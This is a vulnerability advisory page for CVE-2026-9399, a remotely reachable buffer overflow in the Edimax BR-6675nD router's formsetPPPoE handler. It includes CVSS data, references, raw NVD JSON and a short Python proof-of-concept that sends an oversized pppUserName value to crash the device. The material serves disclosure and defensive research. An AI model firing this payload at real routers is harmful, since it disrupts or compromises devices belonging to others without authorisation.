CVE-2026-9399

Description

A vulnerability was detected in Edimax BR-6675nD 1.12. This vulnerability affects the function formsetPPPoE of the file /goform/formsetPPPoE of the component POST Request Handler. Performing a manipulation of the argument pppUserName results in buffer overflow. It is possible to initiate the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Edimax BR-6675nD 1.12

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-9399 PoC Example
# Target URL for the vulnerable endpoint
target_url = "http://<target_ip>/goform/formsetPPPoE"

# malicious payload to trigger buffer overflow
# Adjust length based on specific buffer size (e.g., 1000 bytes)
payload = "A" * 1000

# Data to be sent in the POST request
# The vulnerability is triggered via the 'pppUserName' parameter
post_data = {
    "pppUserName": payload,
    "pppPassword": "test"
}

try:
    print(f"Sending payload to {target_url}...")
    response = requests.post(target_url, data=post_data, timeout=5)
    
    # Check if device responded or crashed
    if response.status_code == 200:
        print("Request sent, check device for crash or behavior change.")
    else:
        print(f"Received status code: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"Device likely crashed or unreachable: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-9399
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-9399
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-9399/
[4] VulDB https://vuldb.com/cve/CVE-2026-9399
[5] https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formsetPPPoE-34b53a41781f8025abcded9e7d0734ef?source=copy_link
[6] https://vuldb.com/submit/811561
[7] https://vuldb.com/vuln/365380
[8] https://vuldb.com/vuln/365380/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-9399", "sourceIdentifier": "[email protected]", "published": "2026-05-24T22:16:16.200", "lastModified": "2026-05-24T22:16:16.200", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in Edimax BR-6675nD 1.12. This vulnerability affects the function formsetPPPoE of the file /goform/formsetPPPoE of the component POST Request Handler. Performing a manipulation of the argument pppUserName results in buffer overflow. It is possible to initiate the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formsetPPPoE-34b53a41781f8025abcded9e7d0734ef?source=copy_link", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/811561", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365380", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365380/cti", "source": "[email protected]"}]}}